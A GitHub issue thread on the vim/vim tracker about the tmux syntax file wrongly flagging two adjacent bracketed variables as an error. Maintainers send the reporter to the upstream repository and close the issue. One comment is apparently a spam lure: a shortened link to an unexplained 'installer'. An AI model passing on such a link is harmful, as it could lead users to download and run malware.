### ISSUE TITLE
More than one bracketed var on the same line shows as a error

### ISSUE THREAD

**Issue by derekschrock** [vim/vim#15611]
### Steps to reproduce

Using a buffer with `ft=tmux` assign a var something like the follow:

`var4=${_var1}${_var2}`

See the error.   This appears to be valid syntax.

Also, see screenshot with the above, valid syntax assignments, and  other valid failing lines.

```tmux
var1=$_var3
var2=$_var3$_var4
var3=${_var1}$_var2
var4=${_var1}${_var2}    # not an error
var4=${_var1}${_var2     # valid error
var5=foo
var6=bar
var7=${_var3***}         # valid error
var8=${_var3}

# vi: set ft=tmux:
```
![Screenshot 2024-09-02 at 8 09 47 PM](https://github.com/user-attachments/assets/610feb9c-3f3d-46f3-bec6-a19cc86665c0)

Init. guess is this too greedy? https://github.com/ericpruitt/tmux.vim/blob/master/vim/syntax/tmux.vim#L40 

### Expected behaviour

For  `var4=${_var1}${_var2}`  to not show as an error.

### Version of Vim

9.1.703

### Environment

kitty (913ce58fe) via macOS 14.6.1 ssh'ed to FreeBSD 14.1 inside tmux with TERM=screen using bash 5.2.32.

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by chrisbra** [comment]
have you reported it upstream? @ericpruitt please

**Comment by ericpruitt** [comment]
@derekschrock, I don't understand why you filed the bug here. You clearly found my canonical repository since you've linked to it, and since that's where the canonical code is, that's where the issue should've been opened. This is also outlined in Vim's [contribution guidelines](https://github.com/vim/vim?tab=readme-ov-file#contributing):

> If you find a problem with one of these files or have a suggestion for improvement, please first try to contact the maintainer directly. Look in the header of the file for the name, email address, github handle and/or upstream repository. You may also check the [MAINTAINERS](https://github.com/vim/vim/blob/master/.github/MAINTAINERS) file.

Please open this issue in the appropriate repository, and I will follow-up there.

**Comment by chrisbra** [comment]
closing here then.

**Comment by derekschrock** [comment]
Doh. Sorry I was half asleep. I thought I was in the correct repo. Would explain why I was confused with vim/vim popping up.
